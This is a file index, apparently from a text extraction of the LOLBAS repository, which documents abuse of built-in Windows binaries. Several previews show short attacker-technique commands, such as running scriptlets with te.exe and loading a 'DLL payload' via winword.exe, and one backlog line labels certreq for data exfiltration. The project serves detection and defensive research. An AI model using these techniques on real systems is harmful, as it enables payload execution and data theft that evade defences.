    "preview": "## te.exe\n* Functions: Execute\n```\n\nte.exe bypass.wsc\nRun COM Scriptlets (e.g. VBScript) by calling a Windows Script Com"
  },
  {
    "path": "Archive-Old-Version/OtherMSBinaries/vsjitdebugger.exe.md",
    "chars": 343,
    "preview": "## vsjitdebugger.exe\n* Functions: Execute\n```\n\nVsjitdebugger.exe calc.exe\nExecutes calc.exe as a subprocess of Vsjitdebu"
  },
  {
    "path": "Archive-Old-Version/OtherMSBinaries/winword.exe.md",
    "chars": 414,
    "preview": "## winword.exe\n* Functions: Execute\n```\n\nwinword.exe /l dllfile.dll\nLaunch DLL payload.\n```\n   \n* Resources:   \n  * http"
  },
  {
    "path": "Archive-Old-Version/OtherScripts/testxlst.js.md",
    "chars": 598,
    "preview": "## testxlst.js\n* Functions: Execute\n```\n\ncscript testxlst.js C:\\test\\test.xml c:\\test\\test.xls c:\\test\\test.out\nTest Jsc"
  },
  {
    "path": "Backlog.txt",
    "chars": 880,
    "preview": "Ntsd.exe\t\tDebugger\nKd.exe\t\t\tDebugger\nCertreq.exe\t\tExfiltrate data\nDbghost.exe\nRobocopy.exe\tNeeds examples\nVssadmin.exe\tv"
  },
  {
    "path": "CONTRIBUTING.md",
    "chars": 938,
    "preview": "# Contributing\n\nFirst, thank you for contributing!\n\nWhen submitting new LOLs, please submit a `yml` sourcefile (`yml/`) "
  },
  {
    "path": "CategoryList.md",
    "chars": 184,
    "preview": "CATEGORY LIST\n\nADS   \nAWL bypass   \nCompile   \nConceal   \nCopy   \nCredentials   \nDecode   \nDownload   \nDump   \nEncode   "
  },
  {
    "path": "LICENSE",
    "chars": 35149,
    "preview": "                    GNU GENERAL PUBLIC LICENSE\n                       Version 3, 29 June 2007\n\n Copyright (C) 2007 Free "
  },
  {
    "path": "NOTICE.md",
    "chars": 9170,
    "preview": "## Purpose\r\n\r\n* The LOLBAS Project is a community-driven open-source resource for documenting \"Living-Off-The-Land\" comm"
  },
  {
    "path": "README.md",
    "chars": 4787,
    "preview": "<p align=\"center\">\n    <a href=\"https://github.com/LOLBAS-Project/LOLBAS/actions/workflows/yaml-linting.yml/badge.svg?br"
  },
  {
    "path": "YML-Template.yml",
    "chars": 1687,
    "preview": "---\nName: Binary.exe\nDescription: Something general about the binary\nAliases:  # Optional field if any common aliases ex"
  },
  {
    "path": "yml/HonorableMentions/Code.yml",
    "chars": 1207,
    "preview": "---\nName: code.exe\nDescription: VSCode binary, also portable (CLI) version\nAuthor: PfiatDe\nCreated: 2023-02-01\nCommands:"
  },
  {
    "path": "yml/HonorableMentions/GfxDownloadWrapper.yml",
    "chars": 19278,
    "preview": "---\nName: GfxDownloadWrapper.exe\nDescription: Remote file download used by the Intel Graphics Control Panel, receives as"
  },
  {
    "path": "yml/HonorableMentions/PowerShell.yml",
    "chars": 1842,
    "preview": "---\nName: Powershell.exe\nDescription: Powershell.exe is a a task-based command-line shell built on .NET.\nAuthor: 'Everyo"
  },
  {
    "path": "yml/OSBinaries/Addinutil.yml",
    "chars": 1850,
    "preview": "---\nName: AddinUtil.exe\nDescription: .NET Tool used for updating cache files for Microsoft Office Add-Ins.\nAuthor: 'Mich"
  },
  {
    "path": "yml/OSBinaries/AppInstaller.yml",
    "chars": 1003,
    "preview": "---\nName: AppInstaller.exe\nDescription: Tool used for installation of AppX/MSIX applications on Windows 10\nAuthor: 'Wade"
  },
  {
    "path": "yml/OSBinaries/Aspnet_Compiler.yml",
    "chars": 1468,
    "preview": "---\nName: Aspnet_Compiler.exe\nDescription: ASP.NET Compilation Tool\nAuthor: Jimmy (@bohops)\nCreated: 2021-09-26\nCommands"
  },
  {
    "path": "yml/OSBinaries/At.yml",
    "chars": 1747,
    "preview": "---\nName: At.exe\nDescription: Schedule periodic tasks\nAuthor: 'Freddie Barr-Smith'\nCreated: 2019-09-20\nCommands:\n  - Com"
  },
  {
    "path": "yml/OSBinaries/Atbroker.yml",
    "chars": 1441,
    "preview": "---\nName: Atbroker.exe\nDescription: Helper binary for Assistive Technology (AT)\nAuthor: Oddvar Moe\nCreated: 2018-05-25\nC"
  },
  {
    "path": "yml/OSBinaries/Bash.yml",
    "chars": 2893,
    "preview": "---\nName: Bash.exe\nDescription: File used by Windows subsystem for Linux\nAuthor: Oddvar Moe\nCreated: 2018-05-25\nCommands"
  },
  {
    "path": "yml/OSBinaries/Bitsadmin.yml",
    "chars": 3691,
    "preview": "---\nName: Bitsadmin.exe\nDescription: Used for managing background intelligent transfer\nAuthor: Oddvar Moe\nCreated: 2018-"
  },
  {
    "path": "yml/OSBinaries/Certoc.yml",
    "chars": 1255,
    "preview": "---\nName: CertOC.exe\nDescription: Used for installing certificates\nAuthor: 'Ensar Samil'\nCreated: 2021-10-07\nCommands:\n "
  },
  {
    "path": "yml/OSBinaries/Certreq.yml",
    "chars": 1303,
    "preview": "---\nName: CertReq.exe\nDescription: Used for requesting and managing certificates\nAuthor: David Middlehurst\nCreated: 2020"
  },
  {
    "path": "yml/OSBinaries/Certutil.yml",
    "chars": 4779,
    "preview": "---\nName: Certutil.exe\nDescription: Windows binary used for handling certificates\nAuthor: Oddvar Moe\nCreated: 2018-05-25"
  },
  {
    "path": "yml/OSBinaries/Change.yml",
    "chars": 1019,
    "preview": "---\nName: Change.exe\nDescription: Remote Desktop Services MultiUser Change Utility\nAuthor: 'Idan Lerman'\nCreated: 2025-0"
  },
  {
    "path": "yml/OSBinaries/Cipher.yml",
    "chars": 1267,
    "preview": "---\nName: Cipher.exe\nDescription: File Encryption Utility\nAuthor: Adetutu Ogunsowo\nCreated: 2024-11-22\nCommands:\n  - Com"
  },
  {
    "path": "yml/OSBinaries/Cmd.yml",
    "chars": 2781,
    "preview": "---\nName: Cmd.exe\nDescription: The command-line interpreter in Windows\nAuthor: Ye Yint Min Thu Htut\nCreated: 2019-06-26\n"
  },
  {
    "path": "yml/OSBinaries/Cmdkey.yml",
    "chars": 948,
    "preview": "---\nName: Cmdkey.exe\nDescription: creates, lists, and deletes stored user names and passwords or credentials.\nAuthor: Od"
  },
  {
    "path": "yml/OSBinaries/Cmdl32.yml",
    "chars": 1317,
    "preview": "---\nName: cmdl32.exe\nDescription: Microsoft Connection Manager Auto-Download\nAuthor: Elliot Killick\nCreated: 2021-08-26\n"
  },
  {
    "path": "yml/OSBinaries/Cmstp.yml",
    "chars": 3820,
    "preview": "---\nName: Cmstp.exe\nDescription: Installs or removes a Connection Manager service profile.\nAuthor: Oddvar Moe\nCreated: 2"
  },
  {
    "path": "yml/OSBinaries/Colorcpl.yml",
    "chars": 965,
    "preview": "---\nName: Colorcpl.exe\nDescription: Binary that handles color management\nAuthor: Arjan Onwezen\nCreated: 2023-06-26\nComma"
  },
  {
    "path": "yml/OSBinaries/ComputerDefaults.yml",
    "chars": 1398,
    "preview": "---\nName: ComputerDefaults.exe\nDescription: ComputerDefaults.exe is a Windows system utility for managing default applic"
  },
  {
    "path": "yml/OSBinaries/ConfigSecurityPolicy.yml",
    "chars": 2228,
    "preview": "---\nName: ConfigSecurityPolicy.exe\nDescription: Binary part of Windows Defender. Used to manage settings in Windows Defe"
  },
  {
    "path": "yml/OSBinaries/Conhost.yml",
    "chars": 1450,
    "preview": "---\nName: Conhost.exe\nDescription: Console Window host\nAuthor: Wietze Beukema\nCreated: 2022-04-05\nCommands:\n  - Command:"
  },
  {
    "path": "yml/OSBinaries/Control.yml",
    "chars": 2621,
    "preview": "---\nName: Control.exe\nDescription: Binary used to launch controlpanel items in Windows\nAuthor: Oddvar Moe\nCreated: 2018-"
  },
  {
    "path": "yml/OSBinaries/Csc.yml",
    "chars": 2315,
    "preview": "---\nName: Csc.exe\nDescription: Binary file used by .NET Framework to compile C# code\nAuthor: Oddvar Moe\nCreated: 2018-05"
  },
  {
    "path": "yml/OSBinaries/Cscript.yml",
    "chars": 2252,
    "preview": "---\nName: Cscript.exe\nDescription: Binary used to execute scripts in Windows\nAuthor: Oddvar Moe\nCreated: 2018-05-25\nComm"
  },
  {
    "path": "yml/OSBinaries/CustomShellHost.yml",
    "chars": 1081,
    "preview": "---\nName: CustomShellHost.exe\nDescription: A host process that is used by custom shells when using Windows in Kiosk mode"
  },
  {
    "path": "yml/OSBinaries/DataSvcUtil.yml",
    "chars": 1694,
    "preview": "---\nName: DataSvcUtil.exe\nDescription: DataSvcUtil.exe is a command-line tool provided by WCF Data Services that consume"
  },
  {
    "path": "yml/OSBinaries/Desktopimgdownldr.yml",
    "chars": 1452,
    "preview": "---\nName: Desktopimgdownldr.exe\nDescription: Windows binary used to configure lockscreen/desktop image\nAuthor: Gal Krist"
  },
  {
    "path": "yml/OSBinaries/DeviceCredentialDeployment.yml",
    "chars": 854,
    "preview": "---\nName: DeviceCredentialDeployment.exe\nDescription: Device Credential Deployment\nAuthor: Elliot Killick\nCreated: 2021-"
  },
  {
    "path": "yml/OSBinaries/Dfsvc.yml",
    "chars": 1299,
    "preview": "---\nName: Dfsvc.exe\nDescription: ClickOnce engine in Windows used by .NET\nAuthor: Oddvar Moe\nCreated: 2018-05-25\nCommand"
  },
  {
    "path": "yml/OSBinaries/Diantz.yml",
    "chars": 2285,
    "preview": "---\nName: Diantz.exe\nDescription: Binary that package existing files into a cabinet (.cab) file\nAuthor: Tamir Yehuda\nCre"
  },
  {
    "path": "yml/OSBinaries/Diskshadow.yml",
    "chars": 1685,
    "preview": "---\nName: Diskshadow.exe\nDescription: Diskshadow.exe is a tool that exposes the functionality offered by the volume shad"
  },
  {
    "path": "yml/OSBinaries/Dnscmd.yml",
    "chars": 1610,
    "preview": "---\nName: Dnscmd.exe\nDescription: A command-line interface for managing DNS servers\nAuthor: Oddvar Moe\nCreated: 2018-05-"
  }
]

// ... and 201 more files (download for full content)

About this extraction

This page contains the full source code of the LOLBAS-Project/LOLBAS GitHub repository, extracted and formatted as plain text for AI agents and large language models (LLMs). The extraction includes 401 files (594.4 KB), approximately 190.2k tokens, and a symbol index with 12 extracted functions, classes, methods, constants, and types. Use this with OpenClaw, Claude, ChatGPT, Cursor, Windsurf, or any other AI tool that accepts text input. You can copy the full output to your clipboard or download it as a .txt file.

Extracted by GitExtract — free GitHub repo to text converter for AI. Built by Nikandr Surkov.

Copied to clipboard!